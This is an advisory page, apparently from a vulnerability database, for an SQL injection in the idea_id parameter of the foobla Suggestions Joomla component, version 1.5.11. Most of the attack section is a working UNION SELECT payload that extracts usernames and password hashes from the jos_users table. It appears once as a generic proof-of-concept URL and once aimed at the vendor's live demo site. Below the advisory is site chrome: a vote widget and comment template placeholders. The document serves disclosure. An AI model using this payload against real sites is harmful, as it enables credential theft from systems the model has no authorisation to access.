The Joomla Foobla Suggestions component remote SQL injection

2009-09-18 / 2009-09-19
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------------------------------------------------------------------------------------- joomla component com_foobla_suggestions (idea_id) SQL Injection Vulnerability ----------------------------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Date : 15 September 2009 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : foobla Suggestions version : 1.5.11 Developer : foobla License : GPL type : Commercial Date Added : 15 September 2009 Demo : http://demo.foobla.com/foobla-suggestions-joomla/ Download : http://foobla.com/products/featured-joomla-extensions/foobla-suggestions-for-joomla.html Description : Have you ever used Uservoice? Would you like to have something similar on Joomla but with unlimited features and no monthly fee? The foobla Suggestions allows you to collect ideas, suggestions, and votes from your cutomers. --------------------------------------------------------------------------- I.SQL injection (idea_id) Poc/Exploit: ~~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection] [Sqlinjection]= null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users Demo Live: ~~~~~~ http://demo.foobla.com/foobla-suggestions-joomla/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top